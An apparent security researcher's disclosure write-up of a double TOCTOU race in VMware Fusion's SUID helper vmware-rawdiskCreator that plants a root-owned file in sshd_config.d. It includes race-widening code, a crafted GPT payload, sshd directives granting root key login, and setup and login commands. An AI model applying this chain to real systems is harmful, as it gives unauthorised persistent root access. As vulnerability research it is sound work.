# C111000: Race Against The Virtual Machine or how a SUID binary in VMware Fusion was raced to gain root privileges on macOS

## Introduction
VMware Fusion is one of the most widely deployed virtualization solutions on macOS. It allows users to run virtual machines, manage virtual disk images, and interact with raw physical disks. One of its lesser-known components is a command-line utility called `vmware-rawdiskCreator`, which creates VMDK (Virtual Machine Disk) descriptors from physical disk devices. What makes this binary particularly interesting from a security perspective is that it is installed as SUID (or setuid) `root`.
During this research, I identified a double TOCTOU (time-of-check to time-of-use) race condition. By exploiting two sequential race windows, an unprivileged user can redirect the binary’s root-privileged file creation operations to arbitrary directories on the filesystem.
Combined with a carefully crafted GPT disk image and a creative choice of target directory, this vulnerability achieves persistent Local Privilege Escalation as `root`.
### Research environment (vulnerable version <= 25H2u1)
Tests were performed on macOS 26.4.1 (25E253). Take this information into consideration if you ever want to reproduce these findings on other macOS versions or VMware Fusion releases.
## Quick download and installation
You can download VMware Fusion from the VMware website (which redirects to the Broadcom website).
After mounting the downloaded .dmg image, all you have to do is click the VMware icon to start the installation.
Then you can launch the tool.
## Target identification
During installation, VMware Fusion places several binaries inside its application bundle. Let’s have a look at the ones installed with the setuid bit.
`vmware-rawdiskCreator` has the setuid bit enabled. The binary is owned by `root` and has the `s` bit set, so it starts running with `root` privileges regardless of which user launches it.
The target could easily have been identified using a tool I developed called MTM, which maps the local attack surface on macOS. It recursively walks the filesystem, identifies Mach-O binaries, and captures file metadata and code-signing entitlements.
The binary is a universal (Fat/fat) Mach-O supporting both Intel and Apple Silicon. Let’s look at its usage.
The `create` command takes a raw disk device (e.g., `/dev/diskXX`), a partition number, an output path, and an adapter type. It produces two output files:
* <USER_DEFINED>-pt.vmdk, the partition table extent (raw MBR + GPT data from the disk).
* <USER_DEFINED>.vmdk, the VMDK descriptor (a text file).
These files are created inside a temporary working directory hierarchy that the binary builds under `TMPDIR` (if the environment variable is set).
## Analysis
The goal of dynamic analysis is to run the binary as expected and observe what happens from a filesystem perspective. For this purpose, we can use `fs_usage`.
> I’m using a custom patched version of `fs_usage_ng`, which is itself a patched version of `fs_usage` from Gergely Kalman.
Since we can now see which functions and syscalls the binary calls, we can begin the first stage of reverse engineering: identify how the paths are constructed and determine whether the user running the binary can control them.
We must therefore reverse the function `sub_10001c9e0()`.
> Since it is quite a long function, I will just summarize what it does rather than show you some screenshots.
`sub_10001c9e0()` starts by taking a process-wide exclusive lock, then calls `_geteuid()` and uses that as the security identity for the temp directory. It keeps two cached paths, selected by the second argument. If a cached path already exists for the current effective UID, it tries `mkdir(path, 0700)`. If that fails with `EEXIST`, it runs `lstat()` and only accepts the directory if all of the following conditions are true:
* It is a directory where `st_uid == geteuid()`.
* Its permissions are restricted to `0700`.
> `st_uid` is the user ID of the owner, as returned by `lstat()`.
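The acceptance check described above can be sketched in C as follows. This is a minimal reconstruction from the summary, not the decompiled code: the name `accept_private_dir()` is hypothetical, and comparing the full permission bits against `0700` is my reading of the second condition.

```c
#include <assert.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if `path` is usable as the private temp directory, 0 otherwise.
 * Hypothetical helper: mkdir(0700) first, and on EEXIST accept the entry only
 * if lstat() reports a real directory owned by the effective UID whose
 * permission bits are exactly 0700 (assumed interpretation). */
int accept_private_dir(const char *path)
{
    struct stat st;

    assert(path != NULL);
    if (mkdir(path, 0700) == 0)
        return 1;                       /* freshly created by this process */
    if (errno != EEXIST)
        return 0;
    if (lstat(path, &st) != 0)
        return 0;
    if (!S_ISDIR(st.st_mode))           /* lstat() does not follow symlinks */
        return 0;
    if (st.st_uid != geteuid())
        return 0;
    return (st.st_mode & 07777) == 0700;
}
```

Note that a check of this kind only describes the entry at the moment `lstat()` runs. Nothing ties that result to later path lookups through the same name.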
If there is no usable cached directory, it searches for a base temp directory. The first argument controls whether it first consults the preference key `tmpDirectory` (`_Preference_GetString()`). After that it tries `_getenv("TMPDIR")`, then hardcoded candidates (including /var/tmp/ and /tmp), then the current working directory via `_File_Cwd()`, and then one more built-in fallback.
> Every candidate is only screened with `_FileIsWritableDir()`.
## Playing with `getenv()`
As shown, we can control the path of the temporary directory by manipulating the `TMPDIR` environment variable. Let’s see what happens with `fs_usage` when this variable is under our control.
## Binary’s behavior
When invoked using `create`, the binary performs the following operations (while running with effective UID 0, `root` privileges):
1. `mkdir` `TMPDIR`/vmware-root/ (mode `0700`).
2. `mkdir` `TMPDIR`/vmware-root/rawdiskCreator<pid>/ (mode `0700`).
3. `open` `TMPDIR`/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>-pt.vmdk (`O_CREAT`).
4. `write` raw MBR + GPT data from the source disk.
5. `open` `TMPDIR`/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>.vmdk (`O_CREAT`).
6. `write` VMDK descriptor text.
7. On error or completion, it `unlink`s the files and `rmdir`s the directories.
When looking at the execution flow, I realized that several properties of this behavior were relevant to perform a TOCTOU attack.
### `TMPDIR` environment variable is user-controlled
The binary inherits `TMPDIR` from the calling process and uses it as the base for its temporary directory hierarchy. On macOS, `TMPDIR` typically points to a per user directory under /private/var/folders/, but an attacker can set it to any path before invoking the binary.
### `O_NOFOLLOW` on source files
While the binary does use `O_NOFOLLOW` when creating destination files (after dropping privileges for the final VMDK output), it does not use this flag for the intermediate source files created in steps 3 and 5 above. This means that if any component of the path is a symlink, the kernel will happily follow it.
> The `O_NOFOLLOW` flag causes the open to fail if the last component of the path is a symbolic link. Its absence here is the root cause of the vulnerability.
### Files are created as `root`
Because the binary’s effective UID is 0 at the time of file creation, the resulting files are owned by `root` with mode `0600`. This is a powerful primitive, as we can create `root`-owned files in any directory where `root` has write access (with the exception of directories protected by SIP).
### Cleanup on exit
The binary removes its temporary files and directories before exiting. This means that after a successful race, we must freeze the binary (via `SIGSTOP`) before it can run its cleanup routine, or the planted files will be deleted.
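The freeze step can be sketched as below, assuming the exploit launched the binary itself so that it is a child process (an assumption on my side, as is the name `freeze_child()`). `kill()` delivers `SIGSTOP`, and `waitpid()` with `WUNTRACED` confirms that the process is really stopped before we move on.

```c
#include <assert.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Sends SIGSTOP to `pid` and waits until it is reported as stopped.
 * Returns 1 if the child is now frozen, 0 otherwise.
 * Only valid when `pid` is a direct child of the caller. */
int freeze_child(pid_t pid)
{
    int status;

    assert(pid > 0);
    if (kill(pid, SIGSTOP) != 0)
        return 0;
    if (waitpid(pid, &status, WUNTRACED) != pid)
        return 0;
    return WIFSTOPPED(status) ? 1 : 0;
}
```

A stopped process never reaches its cleanup routine until it receives `SIGCONT`, which is what keeps the planted file in place.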
## Understanding the TOCTOU vulnerability
The vulnerability is a classic TOCTOU race condition. The binary performs directory creation and file creation as separate, non-atomic operations. Between these operations, an attacker can substitute a directory with a symlink, causing the binary’s subsequent `open()` calls to follow the symlink to a location of the attacker’s choosing.
The attack consists of two sequential TOCTOU swaps:
After both swaps succeed, the path that the binary resolves becomes:
The binary creates <USER_DEFINED>-pt.vmdk as `root` in what it believes is its private temp directory, but the file actually lands in /etc/ssh/sshd_config.d/.
## Enlarging your race window
TOCTOU races are known for being extremely time sensitive. The interval between the creation of the directory and the creation of the file can be as short as a few microseconds. To ensure I win the race reliably, I used two techniques.
### Path-padding symlink chains
Instead of pointing `TMPDIR` directly at a temporary directory, we create a chain of 20 symlinks, each stuffed with ./ and d/../ path components.
tmpdir/s1 -> ././d/../././d/../...s2
tmpdir/s2 -> ././d/../././d/../...s3
...
tmpdir/s20 -> ././d/../././d/../... (resolves to tmpdir itself)
tmpdir/d -> (real directory, needed for "d/../" to resolve)
> In XNU, the main pathname resolution function is `namei(struct nameidata *ndp)`. `namei()` converts a pathname into the resolved vnode/inode, and its header comment describes the lookup flow: choose the starting directory, then repeatedly call lookup on path components. At a lower level, the resolver is `lookup()`, which is called from inside `namei()`.
We then set `TMPDIR` to <tmpdir>/s1. When the binary resolves this path, the function `namei()` must traverse thousands of path components across 20 symlink hops. This wastes tens of microseconds of CPU time in kernel space, dramatically widening the race window.
> This technique is inspired by the path padding approach described by Borisov, Johnson, and Dean in “Fixing Races for Fun and Profit: How to Abuse atime” (USENIX Security 2005). The idea is that forcing the kernel to perform long path resolution slows down the victim process without requiring any special privileges.
The resulting layout closely resembles the diagram from the USENIX Security 2005 paper.
The total number of symlink hops must stay within the `MAXSYMLINKS` limit of macOS (defined in bsd/sys/param.h in the XNU kernel source).
Our directory structure requires:
* 20 (chain) + 1 (vmware-root) + 1 (rawdiskCreator<pid>) = 22 hops
This fits within the 32-hop limit.
### CPU pressure
In addition to path padding, we spawn background threads that perform cache thrashing memory writes. These threads compete with the vulnerable binary for CPU time, causing it to be preempted more frequently and further stretching the duration of the race window.
One pressure thread is spawned per logical CPU. The combination of path padding and CPU pressure makes the race extremely reliable. During my tests, it was consistently won within 1 to 2 attempts (iterations of the `while` loop) on my host and within 25 to 28 attempts inside a VM.
## Stage 1: `RENAME_SWAP` on vmware-root
The first race targets the vmware-root directory. After the binary creates `TMPDIR`/vmware-root/ as a real directory, we need to replace it with a symlink to our staging directory.
We monitor the temp directory using `fstatat()`, waiting for vmware-root to appear.
The key operation here is `renameatx_np()` with the `RENAME_SWAP` flag. This is a macOS specific system call that atomically swaps two directory entries. We precreate a symlink called .swap_sym pointing to our staging directory, then swap it with vmware-root in a single atomic operation.
> `renameatx_np(2)` with `RENAME_SWAP` performs an atomic exchange of two filesystem entries. This is strictly better than a non-atomic `rename` + `symlink` sequence, because it eliminates the brief window where neither entry exists. However, both entries must be on the same filesystem.
If `RENAME_SWAP` fails (for example, if the temp directory and the swap target are on different filesystems), we fall back to a non-atomic `rename` + `symlink` sequence.
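The swap-with-fallback logic can be sketched as follows. This is an illustration under assumptions: the function names and the `parked_path` parameter are hypothetical, and the fallback shown is simply one way to write the non-atomic `rename` + `symlink` sequence. On non-Apple systems only the fallback path is compiled.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Replaces the directory entry `dir_path` with a symlink to `staging`.
 * First tries to exchange it atomically with the pre-created symlink
 * `swap_sym_path` (macOS only); otherwise moves the directory to
 * `parked_path` and creates the symlink afterwards (non-atomic).
 * Returns 0 on success, -1 on failure. */
int swap_in_symlink(const char *dir_path, const char *swap_sym_path,
                    const char *parked_path, const char *staging)
{
    assert(dir_path && swap_sym_path && parked_path && staging);
#ifdef __APPLE__
    if (renameatx_np(AT_FDCWD, swap_sym_path, AT_FDCWD, dir_path,
                     RENAME_SWAP) == 0)
        return 0;                       /* both entries exchanged atomically */
#endif
    if (rename(dir_path, parked_path) != 0)
        return -1;
    return symlink(staging, dir_path);  /* brief window with no entry at all */
}

/* Returns 1 if `path` itself is a symlink. */
int is_symlink(const char *path)
{
    struct stat st;
    return lstat(path, &st) == 0 && S_ISLNK(st.st_mode);
}
```

In the atomic case the original directory ends up under the name of the swap symlink, so nothing has to be deleted inside the race window.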
After the swap succeeds, the binary’s vmware-root entry now points to our staging directory. Any subsequent path resolution through vmware-root lands under our control.
## Stage 2: `rmdir` + `symlink` on rawdiskCreator<pid>/
After Stage 1, the binary creates rawdiskCreator<pid>/ inside what is now our staging directory. We need to replace this directory with a symlink to the final target /etc/ssh/sshd_config.d/.
The process is similar to Stage 1, but we use `rmdir()` + `symlink()` instead of `RENAME_SWAP`, because the directory to be replaced is freshly created and empty.
Before resuming the binary, we set up a `kqueue` watch on the target directory using `EVFILT_VNODE` with `NOTE_WRITE`. This mechanism allows us to be notified the instant a new file appears in the target directory.
> `kqueue(2)` is the macOS kernel event notification interface. `EVFILT_VNODE` with `NOTE_WRITE` fires when the contents of a directory change (e.g., a file is created or deleted). This is significantly faster than polling with `readdir()`, allowing us to freeze the binary almost immediately after it creates the first file.
When the binary resumes and creates <USER_DEFINED>-pt.vmdk, the full path resolution proceeds as follows:
The `kqueue` fires, and we immediately `SIGSTOP` the binary again. This is critical as the binary creates <USER_DEFINED>-pt.vmdk first, then <USER_DEFINED>.vmdk. By freezing it after the first file is created, but before the second, we ensure that only <USER_DEFINED>-pt.vmdk lands in the target directory.
## Crafting the payload
The planted file <USER_DEFINED>-pt.vmdk contains the raw MBR (Master Boot Record) and GPT (GUID Partition Table) data from the source disk. Since we craft the source disk image ourselves, we have full control over its contents.
### MBR boot code
According to the UEFI specification, the first 440 bytes of the MBR are reserved for boot code. On GPT disks, this area is unused, which gives us 440 bytes of fully controlled payload at the very beginning of the -pt.vmdk file.
> On a GPT disk, the BootCode field in the first sector is not used because UEFI firmware does not execute sector 0. Instead of running raw disk code like BIOS does with MBR, UEFI reads the GPT directly and loads a bootloader from the EFI System Partition.
### Building a valid GPT image
We cannot simply dump arbitrary data into a file and pass it to the binary. The `vmware-rawdiskCreator` binary validates that the source disk contains a valid GPT partition table with at least one partition. We must construct a compliant GPT image.
Our image builder creates a minimal 10 MB disk image with:
* A protective MBR with our payload in the boot code area.
* A primary GPT header (sector 1) with valid checksums.
* A partition entry array (sectors 2-33) containing one Apple HFS+ partition.
* A backup GPT header and entry array at the end of the image.
The partition type GUID is set to Apple HFS/HFS+, which the binary accepts for partition mode operation. The image is then attached as a virtual disk device using `hdiutil`.
_Command:_
hdiutil attach -nomount payload.img
_Output:_
/dev/diskXX GUID_partition_scheme
/dev/diskXXs1 Apple_HFS
This /dev/diskXX device is passed to `vmware-rawdiskCreator` as the source disk.
### Eliminating newline (`0x0A`) bytes from GPT structures
For reasons that will become clear in the next section, the planted -pt.vmdk file must be parseable as a valid `sshd` configuration file. The configuration format we target uses `#` to denote comments. Our strategy is as follows:
1. The payload (first 440 bytes) contains valid configuration directives and ends with `\n#`.
2. The `#` at the end of the payload makes everything that follows a comment.
3. If there are no more `0x0A` (newline) bytes in the remaining ~34KB of GPT data, the entire binary content forms a single, very long comment line.
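The three steps above can be sketched as a small helper that fills the boot code area. The function names are hypothetical, and padding the unused remainder of the 440 bytes with additional `#` characters is an assumption of this sketch (any byte other than `0x0A` would preserve the single comment line).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BOOT_CODE_LEN 440   /* boot code area at the start of sector 0 */
#define SECTOR_LEN    512

/* Copies `directives` (which must end with '\n') to the start of the sector
 * and fills the rest of the boot code area with '#'. The first '#' opens the
 * comment; the others are padding (assumed choice).
 * Returns 0 on success, -1 if the text does not fit or lacks the final '\n'. */
int fill_boot_code(uint8_t sector[SECTOR_LEN], const char *directives)
{
    size_t len;

    assert(sector != NULL && directives != NULL);
    len = strlen(directives);
    if (len == 0 || len >= BOOT_CODE_LEN || directives[len - 1] != '\n')
        return -1;
    memcpy(sector, directives, len);
    memset(sector + len, '#', BOOT_CODE_LEN - len);
    return 0;
}

/* Counts the 0x0A bytes in buf[from .. len). */
size_t count_newlines(const uint8_t *buf, size_t len, size_t from)
{
    size_t n = 0;
    for (size_t i = from; i < len; i++)
        if (buf[i] == 0x0A)
            n++;
    return n;
}
```

With three directives, `count_newlines()` over the whole file should report exactly three newline bytes, all of them inside the directive text.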
Most GPT fields are naturally free of `0x0A`.
The problematic fields are the CRC32 checksums. These are computed over other fields and cannot be directly set to arbitrary values. However, we can influence them indirectly by modifying fields that contribute to the checksum but have no semantic significance to the binary (we can brute-force two GUID fields).
#### Partition unique GUID (16 bytes)
This is a random identifier for the partition. We iterate through candidate values, computing the CRC32 of the full 128 entry partition array for each, until we find one where the resulting CRC contains no `0x0A` byte. Each candidate byte is deterministically derived and clamped away from `0x0A`.
#### Disk GUID (16 bytes)
This identifies the disk itself. We iterate similarly, but this time we must satisfy two constraints simultaneously. The primary header CRC and the backup header CRC must both be free of `0x0A`. The two headers have different LBA values (the backup header’s `myLBA` and `alternateLBA` are swapped), so their CRCs differ.
In practice, both searches converge in 1 to 3 attempts. After bruteforcing, a final scan verifies that zero `0x0A` bytes remain anywhere in the GPT structures.
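The partition GUID search can be sketched as follows. The CRC is the standard reflected CRC-32 used by GPT, and the entry layout (128 entries of 128 bytes, unique GUID at offset 16) follows the UEFI specification. The function names and the way candidate bytes are derived from the attempt counter are arbitrary choices made for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ENTRY_SIZE         128
#define ENTRY_COUNT        128
#define UNIQUE_GUID_OFFSET 16   /* UniquePartitionGUID inside a GPT entry */

/* Standard reflected CRC-32 (polynomial 0xEDB88320), bitwise version. */
uint32_t crc32_ieee(const uint8_t *buf, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= buf[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Returns 1 if any of the four CRC bytes equals 0x0A. */
int crc_has_newline(uint32_t crc)
{
    for (int i = 0; i < 4; i++)
        if (((crc >> (8 * i)) & 0xFFu) == 0x0Au)
            return 1;
    return 0;
}

/* Rewrites the unique GUID of entry 0 until CRC32(entries) has no 0x0A byte.
 * Returns the attempt number that succeeded, or -1 after max_tries. */
int search_partition_guid(uint8_t *entries, int max_tries, uint32_t *crc_out)
{
    assert(entries != NULL && crc_out != NULL);
    for (int attempt = 1; attempt <= max_tries; attempt++) {
        uint8_t *guid = entries + UNIQUE_GUID_OFFSET;
        for (int i = 0; i < 16; i++) {
            uint8_t v = (uint8_t)(attempt * 31 + i * 7 + 1); /* illustrative */
            guid[i] = (v == 0x0A) ? 0x0B : v;  /* clamp away from newline */
        }
        uint32_t crc = crc32_ieee(entries, (size_t)ENTRY_SIZE * ENTRY_COUNT);
        if (!crc_has_newline(crc)) {
            *crc_out = crc;
            return attempt;
        }
    }
    return -1;
}
```

For a uniformly distributed CRC, the chance that none of its four bytes is `0x0A` is about (255/256)^4, roughly 98%, which is consistent with the search ending after very few attempts. The disk GUID search would follow the same pattern with two CRCs to check per candidate.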
## Finding the right target or why sudoers.d fails and sshd_config.d works
The exploit gives us the ability to create a `root` owned file in any directory (excluding those protected by SIP). The planted file is always named <USER_DEFINED>-pt.vmdk (derived from the output basename and the -pt.vmdk suffix hardcoded in the binary). The key question is, “Where should we plant this file to achieve privilege escalation?”.
### sudoers.d dead end
The obvious first target is /etc/sudoers.d/. On macOS, /etc/sudoers includes this directive:
File: /etc/sudoers
...
## Read drop-in files from /private/etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /private/etc/sudoers.d
Despite the `#` prefix, this is not a comment. The `#includedir` directive tells sudo to read all configuration files from the specified directory. If we could plant a file containing `%staff ALL=(ALL) NOPASSWD: ALL` in /etc/sudoers.d/, any member of the `staff` group (which includes all local users on macOS) would gain passwordless `sudo` access.
However, `sudo` applies a filename filter to files read via `#includedir`. According to the sudoers(5) manual page, when `sudo` reads the sudoers file via `#includedir`, it skips any file whose name ends in `~` or contains a `.`.
Our file suffix is -pt.vmdk. It contains a `.`, so `sudo` will unconditionally skip it.
Since the filename is derived from the binary’s internal logic (it appends .vmdk and -pt.vmdk to the output path argument), there is no way to avoid the dots.
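The filename rule quoted from sudoers(5) is easy to express as a predicate. The sketch below is my own restatement of that rule, not code taken from `sudo`, and the function name is hypothetical.

```c
#include <assert.h>
#include <string.h>

/* Returns 1 if a file named `name` would be skipped under the #includedir
 * rule: the name ends in '~' or contains a '.'. */
int sudo_includedir_skips(const char *name)
{
    size_t len;

    assert(name != NULL);
    len = strlen(name);
    if (len == 0)
        return 1;                        /* nothing usable to include */
    return name[len - 1] == '~' || strchr(name, '.') != NULL;
}
```

Any name produced by the binary ends in .vmdk, so the predicate is always true for our planted file, whatever output basename we choose.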
I explored several workarounds:
* LaunchDaemons: /Library/LaunchDaemons/ requires `.plist` extension. `launchctl load` returns “Input/output error” for .vmdk files.
* Periodic scripts: `periodic(8)` checks executability. Our file has mode `0600` (no execute bit), and we cannot `chmod` it.
* PAM: /etc/pam.d/ requires files named after the service (e.g., `sudo`, `login`). A file named -pt.vmdk does not match any service.
* cron.d: Does not exist by default on macOS.
* paths.d: `path_helper` runs as the calling user, which cannot read our `0600` file. And even when readable, paths.d entries are appended (not prepended) to `PATH`, preventing command shadowing.
### The sshd_config.d breakthrough
After exhausting the obvious targets, I examined how macOS configures OpenSSH. The file /etc/ssh/sshd_config contains the directive `Include /etc/ssh/sshd_config.d/*`.
This is a critical difference from sudo’s `#includedir`. OpenSSH’s `Include` directive uses standard `glob(3)` pattern matching. The pattern `*` matches all non-hidden files regardless of their extension or the presence of dots in their filename. Our -pt.vmdk file matches this glob and will be included.
> The distinction is subtle but critical. sudo’s `#includedir` applies a custom filename filter (rejecting files with `.`), while OpenSSH’s `Include` uses the system’s `glob(3)` function, which has no such filter. This difference is what makes sshd_config.d a viable target when sudoers.d is not.
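The matching behaviour of `*` can be checked with `fnmatch(3)`, which implements the same shell pattern rules. This is a stand-in for illustration (the function name is hypothetical, and `sshd` itself calls `glob`, not this helper). `FNM_PERIOD` reproduces the rule that a leading `.` must be matched explicitly.

```c
#include <assert.h>
#include <fnmatch.h>
#include <stddef.h>

/* Returns 1 if `name` is matched by the pattern "*" when a leading '.'
 * has to be matched explicitly (hidden files are not matched). */
int include_star_matches(const char *name)
{
    assert(name != NULL);
    return fnmatch("*", name, FNM_PERIOD) == 0;
}
```

Dots inside the name do not matter to the pattern. Only a dot in the first position keeps a file out of the match.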
Furthermore, the `Include` directive appears at the top of sshd_config, before all other options. Since OpenSSH uses first-match-wins semantics, our directives take precedence. sshd_config uses `#` for comments, just like sudoers, so our `\n#` trick works identically. `sshd` runs as `root` and can read the `0600` file.
I verified that the existing file in the include directory (100-macos.conf) does not conflict with our payload:
None of these options overlap with our payload, as our payload consists of:
PermitRootLogin yes
AuthorizedKeysCommand /bin/cat /tmp/.k
AuthorizedKeysCommandUser root
#
When the binary writes this into the MBR boot code area and the rest of the GPT data follows, the resulting <USER_DEFINED>-pt.vmdk file looks like:
Line 1: PermitRootLogin yes (valid sshd_config directive)
Line 2: AuthorizedKeysCommand /bin/cat /tmp/.k (valid sshd_config directive)
Line 3: AuthorizedKeysCommandUser root (valid sshd_config directive)
Line 4: #<34 KB of binary GPT data> (comment with no newlines to EOF)
Each directive serves a specific purpose:
* `PermitRootLogin yes`, allows SSH login as the `root` user.
* `AuthorizedKeysCommand /bin/cat /tmp/.k`, tells `sshd` to execute `/bin/cat /tmp/.k` to obtain authorized public keys for any connecting user. The `/bin/cat` binary satisfies `sshd`’s requirement that the command be owned by `root` and not writable by group or others. This approach is additive: it does not override `AuthorizedKeysFile`, so existing SSH authentication for other users remains unaffected.
* `AuthorizedKeysCommandUser root`, specifies that the command should run as `root`.
The file /tmp/.k needs to be created before running the exploit, as it holds our Ed25519 public key. But first, I verified that `sshd` accepts this configuration by running `sshd` in test mode.
_Command:_
/usr/sbin/sshd -T -f /tmp/test_main.conf -h /tmp/test_hostkey | grep -E 'permit|authorized'
_Output:_
permitrootlogin yes
authorizedkeyscommand /bin/cat /tmp/.k
authorizedkeyscommanduser root
All three directives are active, and `sshd` exits with code 0, confirming that the binary GPT data after `#` is correctly treated as a comment.
## Exploitation and proof of concept
### Prerequisites
The exploit requires SSH (Remote Login) enabled on the target system (or patience for it to be enabled).
### Creation of cryptographic keys
Before running, we prepare the SSH keys that will be used for `root` authentication:
ssh-keygen -t ed25519 -f /tmp/.kp -N ""
cp /tmp/.kp.pub /tmp/.k
### Compiling the exploit
cc -O2 -lpthread -o exploit exploit.c
### Running the exploit
File: exploit.c (sha256: 7e56de8b1fb461f4e67559a8d89b7368246156fe0448717da4514aa2183718a9)
/*
* /\ .-----. /\
* //\\/ \//\\
* |/\| 0 |/\|
* //\\\;-----;///\\
* // \/ . \/ \\
* (| ,-_|coiffeur|_-, |)
* //`__\.-.-./__`\\
* // /.-( )-.\ \\
* (\ |) ' ' (| /)
* ` (| |) `
* \) (/
* Title: VMware Fusion TOCTOU LPE as root (macOS)
* Author: Mathieu Farrell aka @Coiffeur0x90
* Summary: Exploits a double TOCTOU race condition in the suid root binary
* vmware-rawdiskCreator to write an attacker controlled, root owned
* file into /etc/ssh/sshd_config.d/. The planted file configures
* sshd to accept root SSH login using a attacker supplied public key,
* achieving persistent local privilege escalation.
...
### Gaining root access
Once sshd is running (if Remote Login is enabled, or after the next reboot on systems where it is enabled), the attacker can SSH in as `root`:
ssh -i /tmp/.kp root@localhost
The planted configuration causes `sshd` to run `/bin/cat /tmp/.k` as the `AuthorizedKeysCommand`, which returns the attacker’s public key. SSH public key authentication succeeds, and the attacker obtains a `root` shell.
### Persistence
The planted file survives reboots. It will be included by `sshd` on every startup via the `Include /etc/ssh/sshd_config.d/*` directive. The attacker maintains `root` SSH access as long as the file remains in /etc/ssh/sshd_config.d/ and the key file exists at `/tmp/.k`.
## The <USER_DEFINED>.vmdk problem
It is worth mentioning a subtlety in the exploit’s race against the binary’s file creation sequence. The binary creates two files:
* <USER_DEFINED>-pt.vmdk, the partition table (our payload).
* <USER_DEFINED>.vmdk, the VMDK descriptor (a text file with VMware-specific syntax).
If <USER_DEFINED>.vmdk is also created in /etc/ssh/sshd_config.d/, it will be included by sshd’s glob and parsed. This file begins with `# Disk DescriptorFile` (a comment), but subsequent lines like `version=1` are not valid sshd_config keywords. `sshd` may treat unknown keywords as fatal errors and refuse to start.
This is why the `kqueue`-based freeze mechanism in Stage 2 is critical. By detecting the first file creation (the `NOTE_WRITE` event on the target directory) and immediately sending `SIGSTOP`, we freeze the binary after <USER_DEFINED>-pt.vmdk is created but before <USER_DEFINED>.vmdk is written. In all of my test runs, only <USER_DEFINED>-pt.vmdk landed in the target directory.
## Conclusion
This research demonstrates how a TOCTOU race condition in a setuid binary can be escalated to full `root` access on macOS. The key ingredients of this recipe were:
* A SUID `root` binary that follows symlinks when creating files in a user-controlled directory hierarchy.
* Path-padding symlink chains to widen the race window to a reliably winnable size.
* An atomic directory swap (`RENAME_SWAP`) for the first race, and a `kqueue`-triggered freeze for precise timing control.
* A crafted GPT disk image with all `0x0A` bytes brute forced out of the CRC32 checksums, making the binary partition table data invisible to line oriented config parsers.
* The subtle difference between `sudo`’s `#includedir` (which filters filenames containing `.`) and OpenSSH’s `Include` (which uses unrestricted `glob(3)` matching), making sshd_config.d a viable target.
Thanks for taking the time to read this article.
## Timeline
* 2026 March 31: Discovered the vulnerability in my hotel room after the second day of attending Csaba Fitzl & Gergely Kalman’s training session at Zer0con.
* 2026 April 12: First email sent to [email protected].
* 2026 April 12: Second email sent to [email protected].
* 2026 April 12: Start of the investigation by VMware team.
* 2026 April 25: Vulnerability confirmed by VMware team.
* 2026 April 25: I declined to join the private Bug Bounty program and therefore declined to sign the associated NDA.
* 2026 April 29: VMware informed me that the process now qualifies as a public disclosure and that they would keep me updated on the rest of the process.
* 2026 May 11: VMware informed me that the advisory would be published.
* 2026 May 14: The advisory was published as VMSA-2026-0003/CVE-2026-41702.
https://therealcoiffeur.com/c111000.html